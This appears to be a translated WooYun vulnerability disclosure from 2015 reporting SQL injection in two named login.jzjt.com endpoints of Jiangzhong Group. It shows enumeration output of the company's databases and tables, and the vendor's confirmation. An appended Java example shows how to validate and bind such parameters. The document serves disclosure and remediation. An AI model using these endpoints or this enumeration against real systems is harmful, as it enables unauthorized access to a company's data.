Vulnerability summary

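Bug ID: wooyun-2015-0126801

Title: SQL injection on a Jiangzhong Group (江中集团) site

Vendor: Jiangzhong Group (江中集团)

Author: ago

Submitted: 2015-07-15 10:50

Fixed: 2015-08-29 13:26

Publicly disclosed: 2015-08-29 13:26

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]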


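Vulnerability details

Disclosure status:

2015-07-15: Details reported to the vendor; awaiting vendor action
2015-07-15: Vendor confirmed; details disclosed to the vendor only
2015-07-25: Details disclosed to core white hats and experts in related fields
2015-08-04: Details disclosed to regular white hats
2015-08-14: Details disclosed to intern white hats
2015-08-29: Details disclosed to the public

Brief description:

..

Detailed description:

http://login.jzjt.com/jznw/zwMore.jsp?comp=11 is vulnerable to SQL injection
http://login.jzjt.com/contents/oaBBS/13.jsp?id=153 is vulnerable to SQL injection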
available databases [10]:
[*] JzWeb
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YC_SmartCard
[*] ysbx_zj
Database: JzWeb
[278 tables]

Proof of vulnerability:

Database: msdb
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.backupfile | 2640 |
| dbo.backupmediafamily | 1320 |
| dbo.backupmediaset | 1320 |
| dbo.backupset | 1320 |
| dbo.sysconstraints | 101 |
| dbo.syscategories | 19 |
| dbo.syssegments | 3 |
+-----------------------+---------+

Suggested fix:

Filtering

Copyright notice: when reposting, please credit the source ago@乌云 (WooYun)
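
Both reported parameters (comp and id) carry plain integers. The following is an added example, not code from the report or from the vendor, showing one way a JSP/Java back end can handle such a parameter: strict allow-list validation followed by a bound PreparedStatement parameter. The class name, table name and column names (NumericParamQuery, example_topic, id, title) are hypothetical.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Optional;
import java.util.OptionalInt;

// Added example: hardened handling of a numeric request parameter such as
// ?id=153. Table and column names (example_topic, id, title) are hypothetical.
public class NumericParamQuery {

    // Allow-list check: 1 to 9 ASCII digits only, so the value always fits an int.
    static OptionalInt parseId(String raw) {
        if (raw == null || !raw.matches("[0-9]{1,9}")) {
            return OptionalInt.empty();
        }
        return OptionalInt.of(Integer.parseInt(raw));
    }

    // The id is bound as a typed parameter and never concatenated into the SQL text.
    static Optional<String> loadTitle(Connection db, String rawId) throws SQLException {
        OptionalInt id = parseId(rawId);
        if (!id.isPresent()) {
            return Optional.empty();   // caller should answer 400 Bad Request
        }
        String sql = "SELECT title FROM example_topic WHERE id = ?";
        try (PreparedStatement ps = db.prepareStatement(sql)) {
            ps.setInt(1, id.getAsInt());
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? Optional.ofNullable(rs.getString(1)) : Optional.empty();
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: one well-formed id and several malformed values.
        String[] samples = {"153", "153 ", "-1", "1e3", "153abc", "", "99999999999"};
        for (String s : samples) {
            System.out.println("[" + s + "] accepted=" + parseId(s).isPresent());
        }
    }
}
```

Parameter binding removes the injection itself. Separately, the msdb row counts in the proof above show that the application's database login can read beyond its own database, so restricting that login limits what any remaining query flaw can reach.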


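Vulnerability response

Vendor response:

Severity: Low

Vulnerability rank: 1

Confirmed: 2015-07-15 13:25

Vendor reply:

Thank you very much. We have located the problem and assigned dedicated staff to fix it.

Latest status:

None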

